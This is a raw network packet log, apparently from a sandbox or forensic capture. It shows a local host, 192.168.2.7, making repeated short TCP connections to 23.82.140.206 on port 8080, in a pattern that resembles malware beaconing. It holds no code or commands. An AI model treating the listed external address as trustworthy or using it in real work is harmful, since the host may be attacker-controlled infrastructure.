                                          Sep 27, 2021 20:27:34.297121048 CEST80805002123.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:34.297301054 CEST500218080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:34.423794985 CEST80805002123.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:34.424037933 CEST500218080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:34.424556017 CEST500218080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:34.427778006 CEST500218080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:34.550858021 CEST80805002123.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:34.553877115 CEST80805002123.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:34.554729939 CEST80805002123.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:34.554852009 CEST500218080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:34.554975033 CEST80805002123.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:34.555001974 CEST80805002123.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:34.555033922 CEST500218080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:34.555066109 CEST500218080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:34.555094957 CEST80805002123.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:34.555140018 CEST500218080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:34.555212975 CEST80805002123.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:34.555238008 CEST80805002123.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:34.555262089 CEST500218080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:34.555293083 CEST500218080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:34.556340933 CEST500218080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:34.681365967 CEST80805002123.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:34.807452917 CEST500228080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:34.935231924 CEST80805002223.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:34.935393095 CEST500228080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:34.936708927 CEST500228080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:35.062177896 CEST80805002223.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:35.062719107 CEST80805002223.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:35.062798023 CEST500228080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:35.188133001 CEST80805002223.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:35.189085960 CEST500228080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:35.189455032 CEST500228080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:35.191580057 CEST500228080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:35.316463947 CEST80805002223.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:35.317742109 CEST80805002223.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:35.318392038 CEST80805002223.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:35.318556070 CEST80805002223.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:35.318604946 CEST80805002223.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:35.318639994 CEST500228080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:35.318661928 CEST80805002223.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:35.318675995 CEST500228080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:35.318715096 CEST500228080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:35.318717003 CEST80805002223.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:35.318732977 CEST80805002223.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:35.318789959 CEST500228080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:35.319688082 CEST500228080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:35.446131945 CEST80805002223.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:35.589529991 CEST500238080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:36.724606037 CEST80805002323.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:36.724761009 CEST500238080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:36.725333929 CEST500238080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:36.857049942 CEST80805002323.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:36.858098984 CEST80805002323.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:36.858355045 CEST500238080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:36.989310980 CEST80805002323.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:36.989500999 CEST500238080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:36.990014076 CEST500238080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:36.993835926 CEST500238080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:37.121956110 CEST80805002323.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:37.124578953 CEST80805002323.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:37.125345945 CEST80805002323.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:37.125468969 CEST80805002323.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:37.125510931 CEST80805002323.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:37.125536919 CEST500238080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:37.125567913 CEST500238080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:37.125583887 CEST80805002323.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:37.125659943 CEST500238080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:37.128164053 CEST80805002323.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:37.128202915 CEST80805002323.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:37.128374100 CEST500238080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:37.129317999 CEST500238080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:37.260232925 CEST80805002323.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:37.385988951 CEST500248080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:37.514156103 CEST80805002423.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:37.514416933 CEST500248080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:37.515203953 CEST500248080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:37.641196966 CEST80805002423.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:37.642944098 CEST80805002423.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:37.643146038 CEST500248080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:37.768743992 CEST80805002423.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:37.768899918 CEST500248080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:37.769401073 CEST500248080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:37.772309065 CEST500248080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:37.894905090 CEST80805002423.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:37.898083925 CEST80805002423.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:37.898818016 CEST80805002423.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:37.898914099 CEST80805002423.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:37.898921013 CEST500248080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:37.898932934 CEST80805002423.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:37.898951054 CEST80805002423.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:37.898972034 CEST500248080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:37.899005890 CEST500248080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:37.899013996 CEST80805002423.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:37.899034023 CEST80805002423.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:37.899060011 CEST500248080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:37.899101973 CEST500248080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:37.900285959 CEST500248080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:38.027509928 CEST80805002423.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:38.151612997 CEST500258080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:38.282609940 CEST80805002523.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:38.285201073 CEST500258080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:38.285911083 CEST500258080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:38.416882992 CEST80805002523.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:38.418454885 CEST80805002523.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:38.418543100 CEST500258080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:38.549443960 CEST80805002523.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:38.550403118 CEST500258080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:38.550956964 CEST500258080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:38.553910971 CEST500258080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:38.682043076 CEST80805002523.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:38.685327053 CEST80805002523.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:38.686053038 CEST80805002523.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:38.686182022 CEST500258080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:38.686295033 CEST80805002523.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:38.686358929 CEST80805002523.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:38.686440945 CEST500258080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:38.686472893 CEST80805002523.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:38.686491013 CEST80805002523.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:38.686506033 CEST80805002523.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:38.686569929 CEST500258080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:38.687274933 CEST500258080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:38.819494963 CEST80805002523.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:38.934215069 CEST500268080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:39.067025900 CEST80805002623.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:39.067326069 CEST500268080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:39.067965984 CEST500268080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:39.201653957 CEST80805002623.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:39.202383995 CEST80805002623.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:39.202554941 CEST500268080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:39.334315062 CEST80805002623.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:39.334557056 CEST500268080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:39.335241079 CEST500268080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:39.338404894 CEST500268080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:39.466799974 CEST80805002623.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:39.470541954 CEST80805002623.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:39.470961094 CEST80805002623.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:39.471005917 CEST80805002623.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:39.471024990 CEST80805002623.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:39.471101999 CEST80805002623.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:39.471123934 CEST500268080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:39.471131086 CEST80805002623.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:39.471143961 CEST500268080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:39.471147060 CEST80805002623.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:39.471173048 CEST500268080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:39.471216917 CEST500268080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:39.472060919 CEST500268080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:39.604753971 CEST80805002623.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:39.729795933 CEST500278080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:39.855962992 CEST80805002723.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:39.856190920 CEST500278080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:39.856926918 CEST500278080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:39.982384920 CEST80805002723.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:39.984018087 CEST80805002723.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:39.984209061 CEST500278080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:40.109589100 CEST80805002723.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:40.109791040 CEST500278080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:40.110327005 CEST500278080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:40.113476038 CEST500278080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:40.236850977 CEST80805002723.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:40.242692947 CEST80805002723.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:40.242713928 CEST80805002723.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:40.242767096 CEST80805002723.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:40.242784023 CEST80805002723.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:40.242794037 CEST80805002723.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:40.242975950 CEST500278080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:40.247266054 CEST500278080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:40.411292076 CEST80805002723.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:40.411554098 CEST500278080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:40.538005114 CEST80805002723.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:40.538044930 CEST80805002723.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:40.538285017 CEST500278080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:40.539033890 CEST500278080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:40.539041996 CEST500278080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:40.664499044 CEST80805002723.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:40.792733908 CEST500288080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:40.917164087 CEST80805002823.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:40.917347908 CEST500288080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:40.918067932 CEST500288080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:41.044439077 CEST80805002823.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:41.044565916 CEST80805002823.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:41.044646978 CEST500288080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:41.170469999 CEST80805002823.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:41.170553923 CEST500288080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:41.171024084 CEST500288080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:41.174050093 CEST500288080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:41.300056934 CEST80805002823.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:41.301930904 CEST80805002823.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:41.302673101 CEST80805002823.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:41.302695990 CEST80805002823.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:41.302716970 CEST80805002823.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:41.302866936 CEST500288080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:41.302872896 CEST80805002823.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:41.302889109 CEST500288080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:41.302891970 CEST80805002823.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:41.302906036 CEST80805002823.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:41.302949905 CEST500288080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:41.302974939 CEST500288080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:41.303670883 CEST500288080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:41.431102037 CEST80805002823.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:41.557832003 CEST500298080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:41.689830065 CEST80805002923.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:41.689945936 CEST500298080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:41.690676928 CEST500298080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:41.822720051 CEST80805002923.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:41.824410915 CEST80805002923.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:41.824562073 CEST500298080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:41.956310034 CEST80805002923.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:41.956538916 CEST500298080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:41.957238913 CEST500298080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:41.960325956 CEST500298080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:42.091607094 CEST80805002923.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:42.096507072 CEST80805002923.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:42.097573996 CEST80805002923.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:42.097604036 CEST80805002923.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:42.097631931 CEST80805002923.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:42.097651958 CEST80805002923.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:42.097714901 CEST500298080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:42.097753048 CEST500298080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:42.097763062 CEST500298080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:42.278558016 CEST80805002923.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:42.278788090 CEST500298080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:42.438137054 CEST80805002923.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:42.438219070 CEST80805002923.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:42.438551903 CEST500298080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:42.439213991 CEST500298080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:42.439246893 CEST500298080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:42.571659088 CEST80805002923.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:42.698782921 CEST500308080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:42.829751968 CEST80805003023.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:42.829926014 CEST500308080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:42.830635071 CEST500308080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:42.962310076 CEST80805003023.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:42.963306904 CEST80805003023.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:42.963439941 CEST500308080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:43.094887018 CEST80805003023.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:43.095043898 CEST500308080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:43.095709085 CEST500308080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:43.100541115 CEST500308080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:43.226789951 CEST80805003023.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:43.234044075 CEST80805003023.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:43.234095097 CEST80805003023.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:43.234112978 CEST80805003023.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:43.234132051 CEST80805003023.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:43.234139919 CEST80805003023.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:43.234167099 CEST80805003023.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:43.234200954 CEST80805003023.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:43.234337091 CEST500308080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:43.234399080 CEST500308080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:43.235810995 CEST500308080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:43.367053986 CEST80805003023.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:43.497731924 CEST500318080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:43.623944044 CEST80805003123.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:43.624113083 CEST500318080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:43.625215054 CEST500318080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:43.751463890 CEST80805003123.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:43.752878904 CEST80805003123.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:43.753042936 CEST500318080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:43.881948948 CEST80805003123.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:43.882133007 CEST500318080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:43.989734888 CEST500318080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:43.991705894 CEST500318080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:44.116825104 CEST80805003123.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:44.120378017 CEST80805003123.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:44.120414972 CEST80805003123.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:44.120456934 CEST80805003123.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:44.120471001 CEST80805003123.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:44.120491028 CEST80805003123.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:44.120512962 CEST80805003123.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:44.120518923 CEST500318080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:44.120548010 CEST80805003123.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:44.120735884 CEST500318080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:44.122354031 CEST500318080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:44.248425007 CEST80805003123.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:44.371299982 CEST500328080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:44.496720076 CEST80805003223.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:44.496900082 CEST500328080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:44.498624086 CEST500328080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:44.624111891 CEST80805003223.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:44.624640942 CEST80805003223.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:44.624913931 CEST500328080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:44.751065969 CEST80805003223.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:44.751190901 CEST500328080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:44.751776934 CEST500328080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:44.754581928 CEST500328080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:44.877218962 CEST80805003223.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:44.881407022 CEST80805003223.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:44.882312059 CEST80805003223.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:44.882404089 CEST80805003223.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:44.882469893 CEST80805003223.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:44.882483006 CEST500328080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:44.882529020 CEST80805003223.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:44.882539034 CEST500328080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:44.882545948 CEST500328080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:44.882600069 CEST500328080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:44.882653952 CEST80805003223.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:44.882669926 CEST80805003223.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:44.882745028 CEST500328080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:45.398509026 CEST500328080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:45.525202036 CEST80805003223.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:47.217119932 CEST500338080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:47.348920107 CEST80805003323.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:47.350056887 CEST500338080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:47.350641012 CEST500338080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:47.481401920 CEST80805003323.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:47.483279943 CEST80805003323.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:47.483511925 CEST500338080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:47.617185116 CEST80805003323.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:47.617505074 CEST500338080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:47.618032932 CEST500338080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:47.621107101 CEST500338080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:47.748953104 CEST80805003323.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:47.751915932 CEST80805003323.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:47.752794027 CEST80805003323.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:47.752866030 CEST80805003323.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:47.753005981 CEST500338080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:47.753015995 CEST80805003323.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:47.753034115 CEST500338080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:47.753041029 CEST80805003323.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:47.753103971 CEST500338080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:47.753115892 CEST80805003323.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:47.753129959 CEST80805003323.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:47.753163099 CEST500338080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:47.753278017 CEST500338080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:47.753873110 CEST500338080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:47.884562016 CEST80805003323.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:48.011445999 CEST500348080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:48.143297911 CEST80805003423.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:48.143431902 CEST500348080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:48.144000053 CEST500348080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:48.276614904 CEST80805003423.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:48.277993917 CEST80805003423.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:48.278093100 CEST500348080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:48.412137985 CEST80805003423.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:48.412276030 CEST500348080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:48.413805962 CEST500348080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:48.416690111 CEST500348080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:48.545485020 CEST80805003423.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:48.551011086 CEST80805003423.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:48.551037073 CEST80805003423.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:48.551064014 CEST80805003423.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:48.551084995 CEST80805003423.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:48.551107883 CEST80805003423.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:48.551146984 CEST80805003423.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:48.551166058 CEST80805003423.82.140.206192.168.2.7
